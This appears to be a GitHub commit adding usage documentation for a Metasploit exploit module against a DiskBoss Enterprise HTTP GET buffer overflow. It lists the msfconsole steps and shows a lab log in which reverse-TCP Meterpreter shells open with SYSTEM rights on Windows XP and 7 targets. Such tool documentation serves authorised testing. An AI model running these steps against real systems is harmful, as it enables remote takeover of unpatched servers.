Skip to content

Commit 1a00ef3

Browse files
committed
Add documentation
1 parent 24014d8 commit 1a00ef3

File tree

1 file changed

+96
-0
lines changed

1 file changed

+96
-0
lines changed
Lines changed: 96 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,96 @@
1+
## Vulnerable Application
2+
3+
DiskBoss Enterprise versions up to v7.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
4+
5+
## Verification Steps
6+
1. Install a vulnerable DiskBoss Enterprise
7+
2. Start `DiskBoss Enterprise` service
8+
3. Start `DiskBoss Enterprise` client application
9+
4. Navigate to `Tools` > `DiskBoss Server Options` > `Server`
10+
5. Check `Enable Web Server On Port 80` to start the web interface
11+
6. Start `msfconsole`
12+
7. Do `use exploit/windows/http/diskboss_get_bof`
13+
8. Do `set rhost 192.168.198.130`
14+
9. Do `check`
15+
10. Verify the target is vulnerable
16+
11. Do `set payload windows/meterpreter/reverse_tcp`
17+
12. Do `set lhost 192.168.198.138`
18+
13. Do `exploit`
19+
14. Verify the Meterpreter session is opened
20+
21+
## Scenarios
22+
23+
```
24+
msf exploit(diskboss_get_bof) > options
25+
26+
Module options (exploit/windows/http/diskboss_get_bof):
27+
28+
Name Current Setting Required Description
29+
---- --------------- -------- -----------
30+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
31+
RHOST 192.168.198.130 yes The target address
32+
RPORT 80 yes The target port
33+
SSL false no Negotiate SSL/TLS for outgoing connections
34+
VHOST no HTTP server virtual host
35+
36+
37+
Payload options (windows/meterpreter/reverse_tcp):
38+
39+
Name Current Setting Required Description
40+
---- --------------- -------- -----------
41+
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
42+
LHOST 192.168.198.138 yes The listen address
43+
LPORT 4444 yes The listen port
44+
45+
46+
Exploit target:
47+
48+
Id Name
49+
-- ----
50+
0 Automatic Targeting
51+
52+
53+
msf exploit(diskboss_get_bof) > exploit
54+
55+
[*] Started reverse TCP handler on 192.168.198.138:4444
56+
[*] Automatically detecting the target...
57+
[*] Selected Target: DiskBoss Enterprise v7.5.12
58+
[*] Sending stage (957999 bytes) to 192.168.198.130
59+
[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:4476) at 2017-01-08 05:12:46 -0500
60+
61+
meterpreter > getuid
62+
Server username: NT AUTHORITY\SYSTEM
63+
meterpreter > sysinfo
64+
Computer : GABOR-03722ADE8
65+
OS : Windows XP (Build 2600, Service Pack 3).
66+
Architecture : x86
67+
System Language : en_US
68+
Domain : WORKGROUP
69+
Logged On Users : 2
70+
Meterpreter : x86/win32
71+
meterpreter > exit
72+
[*] Shutting down Meterpreter...
73+
74+
[*] 192.168.198.130 - Meterpreter session 1 closed. Reason: User exit
75+
msf exploit(diskboss_get_bof) > set rhost 192.168.198.133
76+
rhost => 192.168.198.130
77+
msf exploit(diskboss_get_bof) > exploit
78+
79+
[*] Started reverse TCP handler on 192.168.198.138:4444
80+
[*] Automatically detecting the target...
81+
[*] Selected Target: DiskBoss Enterprise v7.4.28
82+
[*] Sending stage (957999 bytes) to 192.168.198.133
83+
[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.133:49187) at 2017-01-08 05:16:13 -0500
84+
85+
meterpreter > getuid
86+
Server username: NT AUTHORITY\SYSTEM
87+
meterpreter > sysinfo
88+
Computer : WIN-BCJL9PJ5BF5
89+
OS : Windows 7 (Build 7601, Service Pack 1).
90+
Architecture : x86
91+
System Language : en_US
92+
Domain : WORKGROUP
93+
Logged On Users : 2
94+
Meterpreter : x86/win32
95+
meterpreter >
96+
```

0 commit comments

Comments
 (0)